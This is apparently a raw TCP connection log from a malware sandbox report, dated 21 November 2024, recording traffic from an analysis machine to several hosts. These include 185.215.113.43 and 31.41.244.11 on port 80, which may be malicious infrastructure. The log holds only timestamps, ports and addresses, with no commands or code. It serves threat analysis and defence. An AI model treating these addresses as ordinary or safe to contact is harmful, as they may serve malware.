                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.997392893 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.997451067 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.998002052 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.998020887 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.018358946 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.018687963 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.018744946 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.019040108 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.019058943 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.097014904 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.097095013 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.097138882 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.097187042 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.097398996 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.142496109 CET4434976213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.142966986 CET49762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.143028975 CET4434976213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.143327951 CET49762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.143343925 CET4434976213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.169466019 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.169883966 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.169904947 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.170284033 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.170288086 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.216881037 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.384169102 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.384248018 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.384330988 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.384548903 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.384568930 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.384582043 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.384588957 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.387620926 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.387718916 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.387859106 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.388032913 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.388066053 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.450643063 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.450721025 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.450783014 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.450958014 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.450978994 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.450990915 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.450995922 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.453438044 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.453526020 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.453681946 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.453948021 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.453984976 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.471072912 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.471147060 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.471209049 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.471343994 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.471360922 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.471370935 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.471375942 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.473474026 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.473531008 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.473622084 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.473728895 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.473747969 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.590972900 CET4434976213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.591027975 CET4434976213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.591079950 CET49762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.591240883 CET49762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.591259003 CET4434976213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.591272116 CET49762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.591279030 CET4434976213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.593805075 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.593831062 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.593893051 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.594069004 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.594080925 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.615163088 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.615211964 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.615266085 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.615380049 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.615380049 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.615420103 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.615446091 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.617607117 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.617647886 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.617716074 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.617827892 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:09.617841005 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:10.489499092 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:10.489588022 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:10.498039007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:10.617691040 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:10.617798090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:10.617958069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:10.737492085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.167371988 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.168204069 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.168236971 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.168900967 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.168908119 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.245820045 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.246505976 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.246553898 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.247175932 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.247184038 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.269762993 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.270267010 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.270292044 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.270745993 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.270752907 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.397484064 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.398662090 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.398742914 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.399291992 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.399307966 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.437629938 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.438188076 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.438208103 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.438653946 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.438661098 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.610644102 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.610707045 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.610809088 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.611134052 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.611155033 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.611169100 CET49765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.611176968 CET4434976513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.614573956 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.614614010 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.614715099 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.614913940 CET49771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.614922047 CET4434977113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.688895941 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.689059019 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.689141035 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.689254045 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.689277887 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.689291000 CET49766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.689297915 CET4434976613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.692547083 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.692622900 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.692720890 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.692914009 CET49772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.692941904 CET4434977213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.714168072 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.714227915 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.714344978 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.714582920 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.714606047 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.714620113 CET49767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.714626074 CET4434976713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.726650953 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.726700068 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.726809978 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.727013111 CET49773443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.727031946 CET4434977313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.841566086 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.841650963 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.841775894 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.842011929 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.842061996 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.842138052 CET49769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.842154026 CET4434976913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.846210003 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.846304893 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.846447945 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.846632004 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.846667051 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.890723944 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.890800953 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.890852928 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.891143084 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.891160011 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.891196012 CET49768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.891202927 CET4434976813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.894382000 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.894433975 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.894530058 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.894685984 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:11.894714117 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.045788050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.045880079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.045912981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.045927048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.045948982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.045958042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.045984030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046005964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046076059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046113968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046154976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046163082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046175003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046210051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046216965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046251059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046267033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046288013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046307087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.046339989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.165764093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.165808916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.165889978 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.165927887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.169946909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.170011997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.246937037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.247062922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.286883116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.286926031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.287048101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.291296959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.291416883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.366611004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.366772890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406498909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406558990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406594992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406630039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406663895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406697989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406732082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406735897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406737089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406737089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406737089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406737089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406768084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406771898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406780958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406802893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406817913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406836987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406852961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406872034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406888008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406905890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406927109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406939983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406958103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406975031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.406989098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407011032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407026052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407044888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407063007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407078028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407090902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407113075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407130003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407146931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407160997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407186985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407198906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.407238007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.466379881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.466451883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.466464043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.466514111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.470160961 CET804977031.41.244.11192.168.2.4
